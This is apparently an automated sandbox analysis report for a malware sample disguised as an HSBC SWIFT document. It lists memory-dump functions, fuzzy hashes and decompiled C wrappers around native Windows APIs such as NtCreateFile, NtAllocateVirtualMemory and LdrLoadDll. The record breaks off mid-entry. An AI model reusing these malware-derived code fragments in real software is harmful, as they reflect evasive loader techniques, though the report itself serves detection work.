                Function 05781A58, Relevance: .0, Instructions: 16COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e504fb40b491d60063a4b195fe6db36c6562e13b3368c3b478d438e62904efe6
                • Instruction ID: 74aaaa655ec36daa1a5c73d00f066463252db943eba5a608568fdc6f610facf1
                • Opcode Fuzzy Hash: e504fb40b491d60063a4b195fe6db36c6562e13b3368c3b478d438e62904efe6
                • Instruction Fuzzy Hash: 98D0A9A61583800FD74A3620C80A8B43F34EB670287CA00C2C0C0AA0229114DB1BE723
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05789958, Relevance: .0, Instructions: 15COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f5378d2594f858dc8e341d555ef8bb0497987b7810abac068347120627c3913f
                • Instruction ID: fd5e4b27538cf9dd9d61b5e9c807dc3db986f03535484bf64209b152b4d8008f
                • Opcode Fuzzy Hash: f5378d2594f858dc8e341d555ef8bb0497987b7810abac068347120627c3913f
                • Instruction Fuzzy Hash: 39D0C9317101148FC704DB5EE4459953BEDEF8D66575040BAF90ACB3A1DEA1AC418B80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05780803, Relevance: .0, Instructions: 14COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 07b188c5166bc1b71c22a96f31c894d0eab20a67d2b8f1b679a4354f0a468b30
                • Instruction ID: 7bc1a0313a4087259b50a00584657323d075412aa2dd9b0a2cc28564de85ecae
                • Opcode Fuzzy Hash: 07b188c5166bc1b71c22a96f31c894d0eab20a67d2b8f1b679a4354f0a468b30
                • Instruction Fuzzy Hash: 2CD097037880C003DB03A374642C38E3FC80F53118F4B08EC84814AA1BE504810B9749
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05786BD8, Relevance: .0, Instructions: 9COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ff194a5c48c57689beb5017cf11a3784925df3a81ed585e92b0f3ea7407f7f6
                • Instruction ID: fc73fc70dc9766bf3185f1ca15072218fce2ef304eff977722d3c500d38955f2
                • Opcode Fuzzy Hash: 9ff194a5c48c57689beb5017cf11a3784925df3a81ed585e92b0f3ea7407f7f6
                • Instruction Fuzzy Hash: 00C08C35100108ABCB00EF41F8098497F6AEB88221700C021FC4A42220CF71B8109AA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05786BC8, Relevance: .0, Instructions: 9COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 812d19bc893147f99ab933d2c3b4e5b08c0093ebf99197496fe26569226deb9a
                • Instruction ID: 0b06ccd1be62fcf45fe6e53729c94e813c827e239a20c885ef2c40e0ea925c0f
                • Opcode Fuzzy Hash: 812d19bc893147f99ab933d2c3b4e5b08c0093ebf99197496fe26569226deb9a
                • Instruction Fuzzy Hash: D6D0C0B6D1C08083C310CBA4EA0E34A3FD0AB44326F0CC482F4448A082C67C701CC330
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05781884, Relevance: .0, Instructions: 9COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8b234036eed19142b73d91484b46ceb446bd917cf721fe137bde7ff355af04c3
                • Instruction ID: 45800801d31b4870bc4622a11135712612ebb9bc55136e21364878bf8c827c13
                • Opcode Fuzzy Hash: 8b234036eed19142b73d91484b46ceb446bd917cf721fe137bde7ff355af04c3
                • Instruction Fuzzy Hash: ACC09B391941049E8701FF50C548CF5BAA6FF55300BC48C5675D446130D721D526F713
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00C05C24, Relevance: 1.8, Instructions: 1841COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.383037022.0000000000C02000.00000002.00020000.sdmp, Offset: 00C00000, based on PE: true
                • Associated: 00000000.00000002.383029558.0000000000C00000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.383095555.0000000000C6E000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b8f0066afe9ac8ffee9ad5069f90da311702bd2acdd50a28b064327b419bace1
                • Instruction ID: 7d74572ab08036ac7d680ba001340ffb4e245fdca71e3c45990ec09652d10510
                • Opcode Fuzzy Hash: b8f0066afe9ac8ffee9ad5069f90da311702bd2acdd50a28b064327b419bace1
                • Instruction Fuzzy Hash: 37E2136144E3C25FDB138B789CB55D1BFB1AE2721871E49CBC0C18F0A3E2195A6BD762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05785A77, Relevance: .3, Instructions: 286COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a26e8ba2ca82775577b0b326a6d2b0568954cd70953212ebfbeee6b50f82852f
                • Instruction ID: 8baff72b64fdc2d64143fb0df9176e23462ed79a350c0844a5610113db53e460
                • Opcode Fuzzy Hash: a26e8ba2ca82775577b0b326a6d2b0568954cd70953212ebfbeee6b50f82852f
                • Instruction Fuzzy Hash: 98E15B31D2075ADACB10EF60C890AEDB771FF95200F61CB9AD50A77264EB706AC9CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05785AB0, Relevance: .3, Instructions: 264COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.386119490.0000000005780000.00000040.00000001.sdmp, Offset: 05780000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7e3b0bdd323be381efc5ec52a49a6a91b73e1f569761594dc0fef9a14dcc826c
                • Instruction ID: b13ca1e57355c2aa12570f6ea25304e84271700b4960cc3a48359cd62659a707
                • Opcode Fuzzy Hash: 7e3b0bdd323be381efc5ec52a49a6a91b73e1f569761594dc0fef9a14dcc826c
                • Instruction Fuzzy Hash: 41D13A31D2071ADACB10EFA4C954AEDB771FF95200F60CB9AD50A37264EB706AC8CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0765F, Relevance: .2, Instructions: 216COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.383037022.0000000000C02000.00000002.00020000.sdmp, Offset: 00C00000, based on PE: true
                • Associated: 00000000.00000002.383029558.0000000000C00000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.383095555.0000000000C6E000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0d9fcdb983754023fede049b85f0d27eb65a68b83ebdbff185285a436dd7bfdd
                • Instruction ID: b620483aaf180a4606d2edebe166c746af2c3d26f970458abb766cdf9fe6ad9f
                • Opcode Fuzzy Hash: 0d9fcdb983754023fede049b85f0d27eb65a68b83ebdbff185285a436dd7bfdd
                • Instruction Fuzzy Hash: 7391AB1204F7D06FD7138B7448A0A92BFB0AE8311475E8AEBC0D5CF5E3D219595ECBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C07715, Relevance: .2, Instructions: 159COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.383037022.0000000000C02000.00000002.00020000.sdmp, Offset: 00C00000, based on PE: true
                • Associated: 00000000.00000002.383029558.0000000000C00000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.383095555.0000000000C6E000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 87c55606049751d594fddac6de1c63b2607a57af61a83a1957f1a7018eafbe05
                • Instruction ID: f3e37f716677b18ceec43de955b879d8a2adff39544ddb9e1333b5c513f20ce7
                • Opcode Fuzzy Hash: 87c55606049751d594fddac6de1c63b2607a57af61a83a1957f1a7018eafbe05
                • Instruction Fuzzy Hash: 5061BF2604F7D05FD713873448A4A927FB0AE43114B5E8AEBC0D98F5B3D258595ECBA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0172FC30, Relevance: 10.6, APIs: 7, Instructions: 146COMMON
                Download Yara Rule
                APIs
                • RtlDecodePointer.NTDLL ref: 0172FC8C
                • RtlDecodePointer.NTDLL ref: 0172FCCB
                • RtlEncodePointer.NTDLL(00000000), ref: 0172FD32
                • RtlDecodePointer.NTDLL(00000000), ref: 0172FD6E
                • RtlEncodePointer.NTDLL(00000000), ref: 0172FDA8
                • RtlDecodePointer.NTDLL ref: 0172FDE8
                • RtlDecodePointer.NTDLL ref: 0172FE26
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: Pointer$Decode$Encode
                • String ID:
                • API String ID: 1638560559-0
                • Opcode ID: 5eb67d3bd1e90467136c242e963479080258dae5ae52b5f1ace161f62e2847db
                • Instruction ID: d0fb75ee902afefafaeab3e4a02043be8a8fbb4b41d2c6eceb89e7f95b9c7fd6
                • Opcode Fuzzy Hash: 5eb67d3bd1e90467136c242e963479080258dae5ae52b5f1ace161f62e2847db
                • Instruction Fuzzy Hash: 00611570C0035ACFEF219FAAC4483AEFFF4AB09319F14892ED469A6291C7795585CF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0172FC20, Relevance: 10.6, APIs: 7, Instructions: 142COMMON
                Download Yara Rule
                APIs
                • RtlDecodePointer.NTDLL ref: 0172FC8C
                • RtlDecodePointer.NTDLL ref: 0172FCCB
                • RtlEncodePointer.NTDLL(00000000), ref: 0172FD32
                • RtlDecodePointer.NTDLL(00000000), ref: 0172FD6E
                • RtlEncodePointer.NTDLL(00000000), ref: 0172FDA8
                • RtlDecodePointer.NTDLL ref: 0172FDE8
                • RtlDecodePointer.NTDLL ref: 0172FE26
                Memory Dump Source
                • Source File: 00000000.00000002.383904029.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false
                Similarity
                • API ID: Pointer$Decode$Encode
                • String ID:
                • API String ID: 1638560559-0
                • Opcode ID: 8449de3649970613c3c0bf7cf634c21d3ac3bccadd5fe542d68d07a4080bf8cc
                • Instruction ID: 179bc96643280694bb9745b8e56342e2c61baaebdfdab6de24310ecf32749639
                • Opcode Fuzzy Hash: 8449de3649970613c3c0bf7cf634c21d3ac3bccadd5fe542d68d07a4080bf8cc
                • Instruction Fuzzy Hash: A0615970C00399CFEF21DFAAC4483AEBFF4AB19309F14891EE465A6291C7795185CF61
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: HSBC_SWIFT-20-11-2021.exe PID: 6020 Parent PID: 7156 HSBC_SWIFT-20-11-2021.exeCOMMON

                Executed Functions

                Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                0x00418683
                0x0041868f
                0x00418697
                0x0041869c
                0x004186a2
                0x004186bd
                0x004186c5
                0x004186c9

                APIs
                • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: !:A$b=A$b=A
                • API String ID: 2738559852-704622139
                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                0x00409b4c
                0x00409b4f
                0x00409b54
                0x00409b59
                0x00409b63
                0x00409b68
                0x00409b6b
                0x00409b6d
                0x00409b75
                0x00409b7a
                0x00409b7a
                0x00409b81
                0x00409b89
                0x00409b8c
                0x00409b8e
                0x00409ba2
                0x00000000
                0x00409ba4
                0x00409baa
                0x00409b5e
                0x00409b5e
                0x00409b5e

                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                0x004185df
                0x004185e7
                0x0041861d
                0x00418621

                APIs
                • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E004187AA(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t22;

				asm("adc bh, [ecx]");
				asm("cmc");
				asm("adc al, 0x55");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191D0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                0x004187aa
                0x004187ae
                0x004187af
                0x004187b3
                0x004187bf
                0x004187c7
                0x004187e9
                0x004187ed

                APIs
                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: e31ce3003adeb8860dd4fa1241d8148ee91c531cd0dcb13074cba61c864653b8
                • Instruction ID: f262f8c217c9b4ffbc9aa3d44d458ab48d0004ac55a622bd76468cc8f31c0f1a
                • Opcode Fuzzy Hash: e31ce3003adeb8860dd4fa1241d8148ee91c531cd0dcb13074cba61c864653b8
                • Instruction Fuzzy Hash: E3F058B1200208AFDB14DF98DC91EE777A8AF8C754F148149FE089B241C630E811CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                0x004187bf
                0x004187c7
                0x004187e9
                0x004187ed

                APIs
                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004186FB, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E004186FB(char __edx, intOrPtr _a12, void* _a16) {
				char _v117;
				long _t9;
				signed int _t13;
				signed int _t14;
				signed int _t15;

				_pop(_t13);
				_pop(_t14);
				_t15 = _t14 | _t13;
				_v117 = __edx;
				_t6 = _a12;
				_t3 = _t6 + 0x10; // 0x300
				_push(_t15);
				_t4 = _t6 + 0xc50; // 0x409753
				E004191D0(_t13, _a12, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a16); // executed
				return _t9;
			}








                0x004186fb
                0x004186fc
                0x004186fd
                0x004186ff
                0x00418703
                0x00418706
                0x00418709
                0x0041870f
                0x00418717
                0x00418725
                0x00418729

                APIs
                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: c574c6b45b536e070185df003f7dabd17914bd51b3e87ace7d1999e688412dd0
                • Instruction ID: 87013b575aafa25b71f174344f1d4c83acff58307a86ac4eff59b1435d4caae2
                • Opcode Fuzzy Hash: c574c6b45b536e070185df003f7dabd17914bd51b3e87ace7d1999e688412dd0
                • Instruction Fuzzy Hash: F1E086366001147BD710DBA9CC45EDBBB58DF94250F15415AFA5DD7242C170A50086E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                0x00418703
                0x00418706
                0x0041870f
                0x00418717
                0x00418725
                0x00418729

                APIs
                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                Memory Dump Source
                • Source File: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                • Instruction ID: e0d7bd5a6bfadb0fcf8a9769120b48ce2fc73b95c2fcb489c00796d59b3111b5
                • Opcode Fuzzy Hash: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                • Instruction Fuzzy Hash: 159002A134100442D10061994418B160045E7E2381F51C115E6058664DC659CD6A7166
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
                • Instruction ID: c0a67213e876ddc94ff44a26181adf9b9571e8130a3221a5a2f75721572d34a8
                • Opcode Fuzzy Hash: 7bb17d742980d329b91939edad69f2bedfc42760fd280e41bc4e65ab25cb6d9b
                • Instruction Fuzzy Hash: 639002B120100402D140719944087560045A7D1381F51C111AA058664EC6998EED76A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
                • Instruction ID: f827235518f72a7f2a7cd8b4585fce2c55a9ab870967542bb86f9271b82ec0f8
                • Opcode Fuzzy Hash: 13feea0b32cf973258a9d61647cf1d74f976ec3f6d8f28c89bd11bd8b8d9fd5b
                • Instruction Fuzzy Hash: D190026160100502D10171994408626004AA7D13C1F91C122A6018665ECA658AAAB171
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
                • Instruction ID: bef7ba3e9815b109828608e67f244e5e57fe8e431f3f91bcd85f29a57f8d1435
                • Opcode Fuzzy Hash: 84aded9cb54dc91b819f10dc97324d4bd3d7eada56877bebba1b52df511fcd7e
                • Instruction Fuzzy Hash: 6D900261242041525545B19944085174046B7E13C1791C112A6408A60CC566996EE661
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
                • Instruction ID: 59582e93a4f2b8ff026664278bfab83939b668397f0134720f2fac7466491af9
                • Opcode Fuzzy Hash: 26aa57875df19c4aae09854d89cbe645802194d7dbeab1a57e6b640c616a3703
                • Instruction Fuzzy Hash: 6C90027120100413D111619945087170049A7D13C1F91C512A5418668DD6968A6AB161
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
                • Instruction ID: 8a269b114d62fb0afead7509322cc703d795562e47fcffdeafc1662ae4cfec49
                • Opcode Fuzzy Hash: 75b6b1daa0cea681f0aa6b25c8af44f541ccbb35ce17ba2765794c49247859fa
                • Instruction Fuzzy Hash: 8E90027120140402D1006199481871B0045A7D1382F51C111A6158665DC665896975B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
                • Instruction ID: 88d89b5a93e372a4e84e2193eb4505eed67cfb02ded18c74ccfbf1a2d44d1a42
                • Opcode Fuzzy Hash: 26795d76b449366ce5471f0b773aad25a89e7d9bf1cc83783b159ad8ff1114cb
                • Instruction Fuzzy Hash: CF90026160100042414071A988489164045BBE2391751C221A598C660DC599897D66A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
                • Instruction ID: 98dc01b99683be868e95991aceaca76167560267beff6c61491cc8353f788467
                • Opcode Fuzzy Hash: de4dcf533129393438c3cb98a06ae0c2bd218045dd0d18db67c5ff228a1dd220
